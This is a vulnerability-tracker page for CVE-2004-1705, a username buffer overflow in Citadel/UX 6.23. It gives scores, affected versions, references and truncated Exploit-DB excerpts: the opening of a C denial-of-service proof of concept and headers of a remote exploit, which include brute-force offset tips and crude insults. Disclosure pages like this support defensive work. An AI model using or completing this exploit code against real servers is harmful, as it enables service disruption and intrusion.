CVE-2004-1705
published 2004-07-30CVE-2004-1705: Buffer overflow in Citadel/UX 6.23 and earlier allows remote attackers to cause a denial of service via a long username.
PriorityP424medium5CVSS 2.0
AVNACLAuNCNINAP
EXPLOIT
EPSS
4.92%
91.0th percentile
Buffer overflow in Citadel/UX 6.23 and earlier allows remote attackers to cause a denial of service via a long username.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| citadel | ux | — | — |
| citadel | ux | — | — |
| citadel | ux | — | — |
| citadel | ux | — | — |
| citadel | ux | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Citadel/UX 6.23 - Remote USER Directive
exploitdb·2004-09-09
CVE-2004-1705 Citadel/UX 6.23 - Remote USER Directive
Citadel/UX 6.23 - Remote USER Directive
---
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com
This is the version which contains targets,abuse it kiddies
Bruteforce:
You only have 4096/4=1024 tries.
The magic offset lies about 2048 + or - 4,8,16....256
So practically speaking you have maximum 256 tries.
Greetings: DrBIOS,Bagabontu,rebel,R4X and all the friends i have.
F goes to: #rosec @ undernet, www rosec info read and laugh
lacroix you are a big lamer,a little script kiddie who wants to gain fame on vortex.pulltheplug
wargame server.By the way,you pathetic cunt..have you even hacked into a box other than yours?
Mad anal fucks goes to all #rosec members,dont forget their moms.
My little private message:
Sa va bagam pule in gat celor de pe irc.apropo.ro,in speci
Exploit-DB
Citadel/UX - Remote Buffer Overflow
exploitdb·2004-08-30
CVE-2004-1705 Citadel/UX - Remote Buffer Overflow
Citadel/UX - Remote Buffer Overflow
---
/*
Citadel/UX remote exploit
By nebunu: pppppppal at yahoo dot com
home.ro lamerz erased my [email protected] address for hosting exploits there..
Citadel/UX is a very well known client/server messaging for BBS which runs on port 504 by default.
It has been discovered that is suffers for a buffer overflow when USER is sent.
The bug was discovered by CoKi,who wrote a PoC denial of service exploit.
I downloaded the source code and performed an audit.The vulnerable function lays in
user_ops.c and it is called getuser().The legal size of an user string is only 64 characters.
When 97 characters are entered then EIP is overwriten and a DoS occurs.
The exploitation is not possible in the trivial way,because of tolower() function that makes
ineffective any
Exploit-DB
Citadel/UX - Remote Denial of Service (PoC)
exploitdb·2004-08-02
CVE-2004-1705 Citadel/UX - Remote Denial of Service (PoC)
Citadel/UX - Remote Denial of Service (PoC)
---
/* citadel_dos.c
*
* Citadel/UX Remote DoS exploit (Proof of Concept)
*
* Tested in Slackware 9.0.0 / 9.1.0 / 10.0.0
*
* by CoKi
* No System Group - http://www.nosystem.com.ar
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define BUFFERSIZE 96+1
#define ERROR -1
#define TIMEOUT 3
#define PORT 504
int connect_timeout(int sfd, struct sockaddr *serv_addr,
socklen_t addrlen, int timeout);
void use(char *program);
int main(int argc, char *argv[]) {
char buffer[BUFFERSIZE], *p, temp[BUFFERSIZE];
int sockfd;
struct hostent *he;
struct sockaddr_in dest_dir;
if(argc != 2) use(argv[0]);
p = buffer;
printf("\n Citadel/UX Remote DoS exploit (Proof of Concept)\n");
printf(" by CoKi \n\n");
No writeups or analysis indexed.
http://marc.info/?l=bugtraq&m=109121546120575&w=2http://marc.info/?l=bugtraq&m=109146099404071&w=2http://secunia.com/advisories/12197http://securitytracker.com/id?1010809http://www.nosystem.com.ar/advisories/advisory-04.txthttp://www.securityfocus.com/bid/10833https://exchange.xforce.ibmcloud.com/vulnerabilities/16840http://marc.info/?l=bugtraq&m=109121546120575&w=2http://marc.info/?l=bugtraq&m=109146099404071&w=2http://secunia.com/advisories/12197http://securitytracker.com/id?1010809http://www.nosystem.com.ar/advisories/advisory-04.txthttp://www.securityfocus.com/bid/10833https://exchange.xforce.ibmcloud.com/vulnerabilities/16840
2004-07-30
Published